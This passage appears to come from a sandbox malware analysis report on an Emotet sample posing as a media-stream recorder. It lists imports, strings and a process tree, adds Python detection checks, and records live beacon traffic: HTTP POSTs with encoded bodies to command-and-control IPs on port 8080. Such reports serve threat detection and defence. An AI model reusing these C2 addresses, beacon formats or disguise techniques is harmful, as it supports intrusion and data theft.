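    for name, image in (("clean", build_fake_pe()), ("tampered", build_fake_pe(tamper=True))):
        reported, actual, ok = verify(image)
        print(f"{name}: reported 0x{reported:08x} actual 0x{actual:08x} match={ok}")
```

To run it against a real file, read the file into bytes and call verify() on it; the sample's own numbers above would then be reproduced as (0x0009e705, 0x000a1768, False).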

Sections

Name Virtual Address Virtual Size Size of Raw Data Characteristics Entropy
.text 0x00001000 0x000076e3 0x00007800 IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 6.20
.rdata 0x00009000 0x000021bf 0x00002200 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 5.35
.data 0x0000c000 0x000006c0 0x00000200 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 1.27
.rsrc 0x0000d000 0x0008e686 0x0008e800 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 4.63

Overlay

Offset 0x00098800
Size 0x00000003

Imports

Library COMCTL32.dll:
0x409000 None
0x409004 ImageList_Add
0x409008 ImageList_Create
Library COMDLG32.dll:
0x409014 GetSaveFileNameA
Library WS2_32.dll:
0x409264 send
0x409268 socket
0x40926c htons
0x409270 setsockopt
0x409274 connect
0x409278 WSAStartup
0x40927c WSAGetLastError
0x409280 gethostname
0x409284 gethostbyname
0x409288 inet_ntoa
0x40928c recv
0x409290 WSACleanup
0x409294 closesocket
Library KERNEL32.dll:
0x40904c Sleep
0x409054 GetModuleFileNameA
0x409058 FindClose
0x40905c FindFirstFileA
0x409060 GetDriveTypeA
0x409070 GetModuleHandleA
0x409074 GlobalReAlloc
0x409078 GlobalUnlock
0x40907c GlobalLock
0x409080 GlobalAlloc
0x409084 InterlockedExchange
0x40908c GetCurrentProcessId
0x409090 GetCurrentThreadId
0x409094 GetTickCount
0x40909c IsDebuggerPresent
0x4090a8 GetCurrentProcess
0x4090ac TerminateProcess
0x4090b0 GetStartupInfoA
Library USER32.dll:
0x4091c0 RegisterClassExA
0x4091c4 LoadCursorA
0x4091c8 LoadIconA
0x4091cc SendMessageA
0x4091d0 EnableWindow
0x4091d4 CreateWindowExA
0x4091d8 GetWindowRect
0x4091dc DestroyWindow
0x4091e0 SetWindowPos
0x4091e4 GetCursorPos
0x4091e8 ReleaseDC
0x4091ec GetDC
0x4091f0 LoadBitmapA
0x4091f4 CreatePopupMenu
0x4091f8 AppendMenuA
0x4091fc TrackPopupMenu
0x409200 LoadImageA
0x409204 SetWindowRgn
0x409208 CreateDialogParamA
0x40920c SetCursor
0x409210 BeginPaint
0x409214 EndPaint
0x409218 SetCapture
0x40921c GetClientRect
0x409220 ReleaseCapture
0x409224 CallWindowProcA
0x409228 SetWindowLongA
0x40922c MessageBoxA
0x409230 GetDlgItem
0x409234 SetFocus
0x409238 DefWindowProcA
0x40923c PostQuitMessage
0x409240 GetMessageA
0x409244 TranslateMessage
0x409248 DispatchMessageA
0x40924c IsDialogMessageA
0x409250 LoadStringW
0x409254 ShowWindow
0x409258 GetDesktopWindow
0x40925c SetRect
Library GDI32.dll:
0x40901c GetStockObject
0x409020 CreateDIBSection
0x409024 GetPixel
0x409028 ExtCreateRegion
0x40902c CombineRgn
0x409030 DeleteObject
0x409034 GetObjectA
0x409038 CreateCompatibleDC
0x40903c SelectObject
0x409040 DeleteDC
0x409044 BitBlt
Library SHELL32.dll:
0x4091b8 ShellExecuteA
Library MSVCR90.dll:
0x4090cc _decode_pointer
0x4090d0 _onexit
0x4090d4 _lock
0x4090d8 __dllonexit
0x4090dc _unlock
0x4090e0 _invoke_watson
0x4090e4 ?terminate@@YAXXZ
0x4090e8 _crt_debugger_hook
0x4090ec __set_app_type
0x4090f0 _encode_pointer
0x4090f4 __p__fmode
0x4090f8 __p__commode
0x4090fc _adjust_fdiv
0x409100 __setusermatherr
0x409104 _configthreadlocale
0x409108 _initterm_e
0x40910c _initterm
0x409110 _acmdln
0x409114 exit
0x409118 _ismbblead
0x40911c _XcptFilter
0x409120 _exit
0x409124 _cexit
0x409128 __getmainargs
0x40912c _amsg_exit
0x409130 _beginthread
0x409134 fwrite
0x409138 fflush
0x40913c _flushall
0x409140 _endthread
0x409144 __CxxFrameHandler3
0x409148 isdigit
0x40914c feof
0x409150 fgets
0x409154 strncmp
0x409158 atoi
0x40915c fprintf
0x409160 fopen
0x409164 _controlfp_s
0x409168 _itoa
0x409170 _stricmp
0x409174 strstr
0x409178 _splitpath
0x40917c ??3@YAXPAX@Z
0x409180 sprintf
0x409184 ??2@YAPAXI@Z
0x409188 atol
0x40918c memset
0x409190 fclose
0x409194 strerror
0x409198 _errno
0x40919c isspace
0x4091a0 _difftime64
0x4091a4 _time64
0x4091a8 memcpy
0x4091ac _wtoi
0x4091b0 _wcslwr

Exports

Ordinal Address Name
1 0x4034e0 Run
.text
`.rdata
@.data
.rsrc
T$ Rj
D$(VPj
:t:="*
SUVWhzk
Whpi@
MHMS_Popup
MHMS_Main
Monkey Head Media Stream
bad allocation
%s%s%s
Item Count: %i
%s%s%s_%04i%s
config.ini
urlbookmarks
urlhistory.txt
help\
RECV_THROTTLE
RECV_MAX_BUFFER
TIMEOUT
WINSOCK
AGENT_NAME
TRACK_SEPERATION
WINDOW_ON_TOP
tooltips_class32
Host Unknown
Unspecified network error occurred!
Host not found!
Network subsystem is unavailable!
No route to host!
Host is unavailable!
Connection refused!
Connection timed out!
No buffer space available!
Connection reset by peer!
Software caused connection abort!
Network dropped connection on reset!
Network is unreachable!
Network is down!
Too many open sockets
Network Error:
%02d:%02d:%02d
StreamTitle='
Enter new bookmark information and click the 'Ok' button to save your information.
You must select an item to edit.
Update bookmark information and click the 'Ok' button to save your information.
Specify output filename:
*.mp3
All Files
Could not open help.chm
help.chm
Error! Failed to locate correct version of the Winsock DLL!
icy-notice2:
icy-notice1:
Content-Type:
icy-url:
icy-genre:
icy-name:
icy-br:
icy-metaint:
%s%sPartialTrack%s
%s%s%s%s
Failed to update bookmark!
You must select an item to delete.
Failed to delete list item!
Are you sure you wish to delete the "%s" item?
Are you sure you wish to delete the media stream URL history?
http://www.monkeyheadsoftware.com/default.asp?app=Y
You must specify a valid stream URL! ex, (http://www.somehost.com:8000/stream/1011)
You must specify a valid stream URL!
You must enter a stream name!
No bookmarks available.
You must select an item first.
A stream is currently being recorded. You must stop the current media stream before proceeding.
%s exists! Do you wish to overwrite this file?
%s exists. Do you wish to overwrite this file?
Invalid filepath! Ensure the specified directory exists!
You must specify a valid destination filename.
File:
Track:
Saved %iK Bytes in %s (hh:mm:ss)
Media stream stopped.
Connection Lost!
Failed to open MP3 file! Ensure all open media files are closed.
Specified number of recording minutes ellapsed.
Failed to open file " %s ". This file may be opened by another application.
Max number of bytes specified has been saved..
@ File Error! Ensure file is closed and check diskspace!
Display application information
Display help file
Application settings
Display bookmarks
Acquire media stream
Visit Monkey Head Software's Home Page!
Minimize window
Close Application
Stream acquisition cancelled!
Contact software provider if this issue persists.
Validate the specified URL or check your Internet connection.
Stream capture classes initialized..
Please wait.. Connecting to remote server..
Delete Bookmark
Edit Bookmark
Get Stream
Stream URL
Stream Name
http://www.monkeyheadsoftware.com?psc=Y
Status: Connecting to media server..
Failed to initialize application! Contact software prodiver if this condition persists!
Failed to load application configuration data! Check config.ini file! If your config file is corrupt, simply delete it and restart the application. The file will be recreated upon restart.
InitCommonControlsEx
ImageList_Add
ImageList_Create
COMCTL32.dll
GetSaveFileNameA
COMDLG32.dll
WS2_32.dll
GetModuleFileNameA
FindClose
FindFirstFileA
GetDriveTypeA
GetPrivateProfileStringA
GetPrivateProfileIntA
WritePrivateProfileStringA
GetModuleHandleA
GlobalReAlloc
GlobalUnlock
GlobalLock
GlobalAlloc
Sleep
KERNEL32.dll
RegisterClassExA
LoadCursorA
LoadIconA
SendMessageA
EnableWindow
CreateWindowExA
GetWindowRect
DestroyWindow
SetWindowPos
GetCursorPos
ReleaseDC
GetDC
SetRect
GetDesktopWindow
ShowWindow
LoadStringW
IsDialogMessageA
DispatchMessageA
TranslateMessage
GetMessageA
PostQuitMessage
DefWindowProcA
SetFocus
GetDlgItem
MessageBoxA
SetWindowLongA
CallWindowProcA
ReleaseCapture
GetClientRect
SetCapture
EndPaint
BeginPaint
SetCursor
CreateDialogParamA
SetWindowRgn
LoadImageA
TrackPopupMenu
AppendMenuA
CreatePopupMenu
LoadBitmapA
USER32.dll
BitBlt
DeleteDC
SelectObject
CreateCompatibleDC
GetObjectA
DeleteObject
CombineRgn
ExtCreateRegion
GetPixel
CreateDIBSection
GetStockObject
GDI32.dll
ShellExecuteA
SHELL32.dll
??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ
??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@PB_WI@Z
??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ
MSVCP90.dll
strstr
_splitpath
??3@YAXPAX@Z
sprintf
??2@YAPAXI@Z
memset
fclose
strerror
_errno
isspace
_difftime64
_time64
memcpy
_wtoi
_wcslwr
fopen
fprintf
strncmp
fgets
isdigit
__CxxFrameHandler3
_endthread
_flushall
fflush
fwrite
_beginthread
MSVCR90.dll
_amsg_exit
__getmainargs
_cexit
_exit
_XcptFilter
_ismbblead
_acmdln
_initterm
_initterm_e
_configthreadlocale
__setusermatherr
_adjust_fdiv
__p__commode
__p__fmode
_encode_pointer
__set_app_type
_crt_debugger_hook
?terminate@@YAXXZ
?_type_info_dtor_internal_method@type_info@@QAEXXZ
_unlock
__dllonexit
_lock
_onexit
_decode_pointer
_except_handler4_common
_invoke_watson
_controlfp_s
InterlockedExchange
InterlockedCompareExchange
GetStartupInfoA
TerminateProcess
GetCurrentProcess
UnhandledExceptionFilter
SetUnhandledExceptionFilter
IsDebuggerPresent
QueryPerformanceCounter
GetTickCount
GetCurrentThreadId
GetCurrentProcessId
GetSystemTimeAsFileTime
_itoa
_stricmp
MHMS.exe
.?AVCGuiElement@@
.?AVtype_info@@
YY\\\`bbiiiib
&***Cf
N303Hj
" .25POTl
$1=<>;Uk
9@Q@BWn
M',CEREEYn
7HHSGGZo
'(CHHHHH^o
sHKKLV\^bbbem
cHRM
bRV.~
Q~)|6
~d4\-
oW Prd
ert^k
`0lZ?
N@@@
"4%oh
/CFAF4#HG/D*J&A/4E&DD9D'JJ*#FCF5-C'/CFAF4#HG/D*J&A/4E&DD9D'JJ*#FCF5-C'/CFAF4#HG/D*J&A/4E&DD9D'JJ*#FCF5-C'/CFAF4#HG/D*J&A/4E&DD9D'JJ*#FCF5-C'/CFAF4#HG/D*J&A/4E&DD9D'JJ*#FCF5-C'/CFAF4#HG/D*J&A/4E&DD9D'JJ*#FCF5-C'/CFAF4#HG/D*J&A/4E&DD9D'JJ*#FCF5-C'/CFAF4#HG/D*J&A/4E&DD9D'JJ*#FCF5-C'/CFAF4#HG/D*J&A/4E&DD9D'JJ*#FCF5-C'/CFAF4#HG/D*J&A/4E&DD9D'JJ*#FCF5-C'/CFAF4#HG/D*J&A/4E&DD9D'JJ*#FCF5-C'/CFAF4#HG/D*J&A/4E&DD9D'JJ*#FCF5-C'/CFAF4#HG/D*J&A/4E&DD9D'JJ*#FCF5-C'/CFAF4#HG/D*J&A/4E&DD9D'JJ*#FCF5-C'/CFAF4#HG/D*J&A/P$P!D
</assembly>
MS Sans Serif
MS Sans Serif
Media stream &URL:
Destination File&path:
&Browse..
Max &Filesize (Mb):
msctls_updown32
Spin1
&Max Minutes:
msctls_updown32
Spin1
&Stop Stream
&Get Stream
Status: Idle
Stream &Information (Read Only):
SysAnimate32
Animate1
MS Sans Serif
SysListView32
List3
&Edit
&Delete
&Get Stream
Bookmark count: 0
MS Sans Serif
&Single MP3 file.
&Numbered files.
&Keep window on top of all other windows.
Clear Stream URL &History
&Cancel
&Apply
Track Seperation Settings
Miscellaneous Options
&Metadata files
You can create a single MP3 file with all tracks merged or create seperate MP3 files for each audio track received. Both the "Numbered files" and "Metadata files" options create individual MP3 files if metadata is available.
The "Numbered files" option creates files namd with a specified prefix and numbered suffix (ex. YourTitle_0001.mp3, YourTitle_0002.mp3, etc). The "Metadata files" options uses available metadata (track, artist, song, etc) to name received audio tracks.
MS Sans Serif
Stream &Name
Stream &URL:
&Cancel
Static
VS_VERSION_INFO
StringFileInfo
040904b0
Comments
CompanyName
Monkey Head Software
FileDescription
Monkey Head Media Stream
FileVersion
1, 0, 0, 1
InternalName
LegalCopyright
2003
LegalTrademarks
OriginalFilename
MHMS.exe
PrivateBuild
ProductName
Monkey Head Media Stream
ProductVersion
1, 0, 0, 1
SpecialBuild
VarFileInfo
Translation
This file is not on VirusTotal.

Process Tree


ygg9ytft62s5ip.exe, PID: 1988, Parent PID: 2480
Full Path: C:\Users\user\AppData\Local\Temp\ygg9ytft62s5ip.exe
Command Line: "C:\Users\user\AppData\Local\Temp\ygg9ytft62s5ip.exe"
ygg9ytft62s5ip.exe, PID: 1356, Parent PID: 1988
Full Path: C:\Users\user\AppData\Local\Temp\ygg9ytft62s5ip.exe
Command Line: --400e05c0
explorer.exe, PID: 1632, Parent PID: 1496
Full Path: C:\Windows\explorer.exe
Command Line: C:\Windows\Explorer.EXE
services.exe, PID: 460, Parent PID: 372
Full Path: C:\Windows\sysnative\services.exe
Command Line: C:\Windows\system32\services.exe
prepmspterm.exe, PID: 2344, Parent PID: 460
Full Path: C:\Windows\SysWOW64\prepmspterm.exe
Command Line: "C:\Windows\SysWOW64\prepmspterm.exe"
prepmspterm.exe, PID: 2732, Parent PID: 2344
Full Path: C:\Windows\SysWOW64\prepmspterm.exe
Command Line: --525413bf
svchost.exe, PID: 884, Parent PID: 460
Full Path: C:\Windows\sysnative\svchost.exe
Command Line: C:\Windows\System32\svchost.exe -k WerSvcGroup
WerFault.exe, PID: 2680, Parent PID: 884
Full Path: C:\Windows\sysnative\WerFault.exe
Command Line: C:\Windows\system32\WerFault.exe -u -p 1632 -s 2896
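The tree above shows at runtime what the signatures summarise: the sample relaunches itself with an argument of "--" plus eight hex digits (pids 1356 and 2732), and the copy dropped to C:\Windows\SysWOW64\prepmspterm.exe is started by services.exe, which is the autorun service registered above coming to life. The following added example (not CAPE's code) encodes the tree as records and writes the two checks a detection engineer would lift from it; the record layout and the helper names are this example's own, and the dropped-file set is taken from the "Drops a binary and executes it" entry above.

```python
import re
from collections import defaultdict

# Records constructed from the process tree above: (name, pid, ppid, image path, command line).
PROCESSES = [
    ("ygg9ytft62s5ip.exe", 1988, 2480, r"C:\Users\user\AppData\Local\Temp\ygg9ytft62s5ip.exe",
     r'"C:\Users\user\AppData\Local\Temp\ygg9ytft62s5ip.exe"'),
    ("ygg9ytft62s5ip.exe", 1356, 1988, r"C:\Users\user\AppData\Local\Temp\ygg9ytft62s5ip.exe",
     "--400e05c0"),
    ("explorer.exe", 1632, 1496, r"C:\Windows\explorer.exe", r"C:\Windows\Explorer.EXE"),
    ("services.exe", 460, 372, r"C:\Windows\sysnative\services.exe", r"C:\Windows\system32\services.exe"),
    ("prepmspterm.exe", 2344, 460, r"C:\Windows\SysWOW64\prepmspterm.exe",
     r'"C:\Windows\SysWOW64\prepmspterm.exe"'),
    ("prepmspterm.exe", 2732, 2344, r"C:\Windows\SysWOW64\prepmspterm.exe", "--525413bf"),
    ("svchost.exe", 884, 460, r"C:\Windows\sysnative\svchost.exe",
     r"C:\Windows\System32\svchost.exe -k WerSvcGroup"),
    ("WerFault.exe", 2680, 884, r"C:\Windows\sysnative\WerFault.exe",
     r"C:\Windows\system32\WerFault.exe -u -p 1632 -s 2896"),
]

# From "Drops a binary and executes it" above.
DROPPED = {r"c:\windows\syswow64\prepmspterm.exe"}

# The whole command line is "--" followed by exactly eight lowercase hex digits.
RELAUNCH_ARG = re.compile(r"^--[0-9a-f]{8}$")


def find_self_relaunch(procs):
    """Children whose parent runs the same image and whose command line is only the hex tag."""
    by_pid = {p[1]: p for p in procs}
    hits = []
    for name, pid, ppid, path, cmdline in procs:
        parent = by_pid.get(ppid)
        if parent and parent[3].lower() == path.lower() and RELAUNCH_ARG.match(cmdline):
            hits.append((name, pid, ppid, cmdline))
    return hits


def find_dropped_binary_execution(procs, dropped):
    """Processes whose image is a file the sample wrote, tagged by whether the Service
    Control Manager (services.exe) or something else started them."""
    by_pid = {p[1]: p for p in procs}
    hits = []
    for name, pid, ppid, path, _cmdline in procs:
        if path.lower() in dropped:
            parent = by_pid.get(ppid)
            via_scm = parent is not None and parent[0].lower() == "services.exe"
            hits.append((name, pid, "service" if via_scm else "direct"))
    return hits


def render_tree(procs):
    """Indented text tree, roots being processes whose parent is not in the record set."""
    by_pid = {p[1]: p for p in procs}
    children = defaultdict(list)
    for p in procs:
        children[p[2]].append(p)
    lines = []

    def walk(p, depth):
        lines.append("  " * depth + f"{p[0]} (pid {p[1]}) {p[4]}")
        for child in children[p[1]]:
            walk(child, depth + 1)

    for root in (p for p in procs if p[2] not in by_pid):
        walk(root, 0)
    return lines


if __name__ == "__main__":
    print("\n".join(render_tree(PROCESSES)))
    print(find_self_relaunch(PROCESSES))
    print(find_dropped_binary_execution(PROCESSES, DROPPED))
```

On a real endpoint the same two checks map onto Sysmon event 1 (ProcessCreate) joined on ParentProcessGuid for the relaunch, and onto event 11 (FileCreate) joined with event 1 on the image path for the dropped-binary rule; the WerFault branch in the tree is explorer.exe crashing during the run and is not Emotet behaviour.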

TCP

Source Source Port Destination Destination Port
192.168.35.21 49176 125.99.61.162 7080
192.168.35.21 49178 91.83.93.105 8080
192.168.35.21 49179 91.83.93.105 8080
192.168.35.21 49180 91.83.93.105 8080
192.168.35.21 49181 91.83.93.105 8080
192.168.35.21 49182 91.83.93.105 8080
192.168.35.21 49183 91.83.93.105 8080
192.168.35.21 49186 91.83.93.105 8080
192.168.35.21 49187 91.83.93.105 8080
192.168.35.21 49188 91.83.93.105 8080
192.168.35.21 49189 91.83.93.105 8080
192.168.35.21 49190 91.83.93.105 8080
192.168.35.21 49191 91.83.93.105 8080
192.168.35.21 49192 91.83.93.105 8080
192.168.35.21 49177 94.183.71.206 7080

UDP

No UDP connections recorded.

HTTP Requests

URI Data
http://91.83.93.105:8080/taskbar/
POST /taskbar/ HTTP/1.1
Referer: http://91.83.93.105/taskbar/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 91.83.93.105:8080
Content-Length: 445
Connection: Keep-Alive
Cache-Control: no-cache

7DBo=sphwcXxaf%2Bc9ykO4nd7nkJAMQhfUSAWSiilMN%2FSTPTS8BMN9bART4TSbqAAyRh%2FTBFbFQo2hvDOeTrYHWbK%2FJsbC1nvzEUtUSzCdFs1RjZEMGWtHytM9p%2BcGTrYrMgt43Y8dZVth6MfTeKkz7CUGI1eadIvs4Xhtn4%2Bg%2FbVVQrA3U9dOUk3VAzYz8XnxGTN9sjdqcHnC6sF67zBgDXJFkq67CwPSgKtpYV6Z4ytYrR9Hef7xQv1d7ZL5Oku91nggQKlYzSPjre1TsVyPGybNPiCblLIQNV6bSzMu62WK7kbZT1ivYovejx4d%2Bn53tehTraz4%2Bu7m%2Fdzp%2B%2Fvsn4jVcXmrkSsnZn4h1GWMflJOZW1uoiTSycG%2Btr6SzrrVq3ykJY0Emn9Z1gNcLLkTkBast2q1TXA%3D
http://91.83.93.105:8080/publish/
POST /publish/ HTTP/1.1
Referer: http://91.83.93.105/publish/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 91.83.93.105:8080
Content-Length: 451
Connection: Keep-Alive
Cache-Control: no-cache

Ewd8IZSd3gtI15D3=m6UhRBVyoVL60VPAsNzwwOT%2BL9WM0xl3bSfjnbPMiuGHoPU1oyqYzcQKOwjCbaKFugPxqBihyHTJv4UviZIr%2FGnKbGyh43f9aS5vwGW479okB9T6jPrMHzs2uXw2z53G3Y8dZVth6MfTeKkz7CUGI1eadIvs4Xhtn4%2Bg%2FbVVQrA3U9dOUk3VAzYz8XnxGTN9sjdqcHnC6sF67zBgDXJFkq67CwPSgKtpYV6Z4ytYrR9Hef7xQv1d7ZL5Oku91nggQKlYzSPjre1TsVyPGybNPiCblLIQNV6bSzMu62WK7kbZT1ivYovejx4d%2Bn53tehTraz4%2Bu7m%2Fdzp%2B%2Fvsn4jVcXmrkSsnZn4h1GWMflJOZW1uoiTSycG%2Btr6SzrrVq3ykJY0Emn9Z1gNcLLkTkBast2q1TXA%3D
http://91.83.93.105:8080/attrib/forced/
POST /attrib/forced/ HTTP/1.1
Referer: http://91.83.93.105/attrib/forced/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 91.83.93.105:8080
Content-Length: 440
Connection: Keep-Alive
Cache-Control: no-cache

haxKGtOdb=2hE96RVRL17CKCXMz5V7C9r73cLcpk8TcgtfhPVA32DKuwfLgDDZ34DYD6Dc1KY3ExbygSCijYRkNmPF%2FvrdQmjMELHiParXP77C7QnPYHZ40%2BRrHgMSzikRn%2BlWFBHO6ja%2B02kyb4NWfvijVbMJPemKOLTs4Xhtn4%2Bg%2FbVVQrA3U9dOUk3VAzYz8XnxGTN9sjdqcHnC6sF67zBgDXJFkq67CwPSgKtpYV6Z4ytYrR9Hef7xQv1d7ZL5Oku91nggQKlYzcUANOyy4JK1YETUhSKATtcaX3TlA8wnmiQ3fbFRYIXVA9jHbvgci61UHFQMFFTKfNVElCY6WLuzgP6XjE%2BNJKWcQSdPZJAuf6wpvWrKCDPjIacrW1kt6XpEOnz1Y4RREBcgkjAzgCWqOsEg%2BBn8ayw%3D
http://91.83.93.105:8080/prov/
POST /prov/ HTTP/1.1
Referer: http://91.83.93.105/prov/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 91.83.93.105:8080
Content-Length: 447
Connection: Keep-Alive
Cache-Control: no-cache

qmoiilWas5dm=Ralkj%2BetuW70gZVyMiFIhTv7gj2RUTTIKsrFABJVYK4oWIE9Xrv%2BTfHzGHD6k2NOojJ76yWxsAsVlwdjOE8OFCVT%2B6mxVscCVqMI7kqwG%2BZbHmLETjOiz0LhGACl%2B6lf6ja%2B02kyb4NWfvijVbMJPemKOLTs4Xhtn4%2Bg%2FbVVQrA3U9dOUk3VAzYz8XnxGTN9sjdqcHnC6sF67zBgDXJFkq67CwPSgKtpYV6Z4ytYrR9Hef7xQv1d7ZL5Oku91nggQKlYzcUANOyy4JK1YETUhSKATtcaX3TlA8wnmiQ3fbFRYIXVA9jHbvgci61UHFQMFFTKfNVElCY6WLuzgP6XjE%2BNJKWcQSdPZJAuf6wpvWrKCDPjIacrW1kt6XpEOnz1Y4RREBcgkjAzgCWqOsEg%2BBn8ayw%3D
http://91.83.93.105:8080/health/teapot/
POST /health/teapot/ HTTP/1.1
Referer: http://91.83.93.105/health/teapot/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 91.83.93.105:8080
Content-Length: 452
Connection: Keep-Alive
Cache-Control: no-cache

3p0PrGTKicOGZ9O6y=hjwFpyMcuRj%2BnCmmkdTB9RUwCkFD6mL%2FuSSZZgbUForiLXyZNNv%2Bsk44Vg%2F1yDwStIw1YOhCLi241VcpaD3j2mHp2gVzgKDb%2FYC0a37ERJklHGbeDEBkWChcEZe51CcK6ja%2B02kyb4NWfvijVbMJPemKOLTs4Xhtn4%2Bg%2FbVVQrA3U9dOUk3VAzYz8XnxGTN9sjdqcHnC6sF67zBgDXJFkq67CwPSgKtpYV6Z4ytYrR9Hef7xQv1d7ZL5Oku91nggQKlYzcUANOyy4JK1YETUhSKATtcaX3TlA8wnmiQ3fbFRYIXVA9jHbvgci61UHFQMFFTKfNVElCY6WLuzgP6XjE%2BNJKWcQSdPZJAuf6wpvWrKCDPjIacrW1kt6XpEOnz1Y4RREBcgkjAzgCWqOsEg%2BBn8ayw%3D
http://91.83.93.105:8080/sess/balloon/tpt/merge/
POST /sess/balloon/tpt/merge/ HTTP/1.1
Referer: http://91.83.93.105/sess/balloon/tpt/merge/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 91.83.93.105:8080
Content-Length: 442
Connection: Keep-Alive
Cache-Control: no-cache

WM4GW2Z7mid=f86IvN8vq1gXjmsmmkS0xyI13nRfyc5zF3Pw6f4pSNAPvSmqbJbUPCQy6OUtbyPiJq%2BgZwfWBmZjJKH8gKHLmnkEXsr4Heo2iF%2FcdOFgRO432OAiBHn5D6%2FJj8tYL0C66ja%2B02kyb4NWfvijVbMJPemKOLTs4Xhtn4%2Bg%2FbVVQrA3U9dOUk3VAzYz8XnxGTN9sjdqcHnC6sF67zBgDXJFkq67CwPSgKtpYV6Z4ytYrR9Hef7xQv1d7ZL5Oku91nggQKlYzcUANOyy4JK1YETUhSKATtcaX3TlA8wnmiQ3fbFRYIXVA9jHbvgci61UHFQMFFTKfNVElCY6WLuzgP6XjE%2BNJKWcQSdPZJAuf6wpvWrKCDPjIacrW1kt6XpEOnz1Y4RREBcgkjAzgCWqOsEg%2BBn8ayw%3D
http://91.83.93.105:8080/merge/
POST /merge/ HTTP/1.1
Referer: http://91.83.93.105/merge/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 91.83.93.105:8080
Content-Length: 477
Connection: Keep-Alive
Cache-Control: no-cache

79JqHChdjiBq83ce=Y0%2BktRySSyZhk%2FF99fWwuHD0BFkgYNAXo%2FyVrnFm1cPHKnwpJdshzFVABgPbozWl2eVagpPCXm834PrGeTSv4sLF%2FbC0XC9goj291mehrFvcUwtNZwutkP4sqP5CNFMhi4VXk96i9ZvrKnw7nKKisz9wjlqVXLsde3dwms3EPSfMtQilE10Ce8ZuMpV5k1Voqoi%2FwyQ55j3%2Fz49PmELK6G7v%2FTlpXICeG9%2FU0k9rWoA4tucZ5IDMRU6Niyrx6PCo5YP%2BGyoMfH1FImr66fLDmcWHcgmE6At3ICNYPZNZIugBJFCniMu7CECVTeDqWMva0iBpxCBNkgTSrJv01%2BCLyf8wmVdFXGCxZY6Il4eH3SwwhCyK%2FyiNe%2B9MFS9Or8h6AKO%2Fb0BCFeP8CocfesZrplaqUTM2Iiydc%2BKivVuksrr69UiA
http://91.83.93.105:8080/scripts/teapot/site/
POST /scripts/teapot/site/ HTTP/1.1
Referer: http://91.83.93.105/scripts/teapot/site/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 91.83.93.105:8080
Content-Length: 469
Connection: Keep-Alive
Cache-Control: no-cache

S0UEtVLMom=MVfusjd%2BG2lCfxbGYpmfhJvRk70j50zdjV7k07chDvYb%2F5Xg7LgUgNlezKQcggIX2EyiFwodTkFySaf0zankClr3uRvTm0HnIViN3YP2Dw32xBr2D66EHfFus%2FiPi2N1i4VXk96i9ZvrKnw7nKKisz9wjlqVXLsde3dwms3EPSfMtQilE10Ce8ZuMpV5k1Voqoi%2FwyQ55j3%2Fz49PmELK6G7v%2FTlpXICeG9%2FU0k9rWoA4tucZ5IDMRU6Niyrx6PCo5YP%2BGyoMfH1FImr66fLDmcWHcgmE6At3ICNYPZNZIugBJFCniMu7CECVTeDqWMva0iBpxCBNkgTSrJv01%2BCLyf8wmVdFXGCxZY6Il4eH3SwwhCyK%2FyiNe%2B9MFS9Or8h6AKO%2Fb0BCFeP8CocfesZrplaqUTM2Iiydc%2BKivVuksrr69UiA
http://91.83.93.105:8080/arizona/
POST /arizona/ HTTP/1.1
Referer: http://91.83.93.105/arizona/
Content-Type: application/x-www-form-urlencoded
DNT: 1
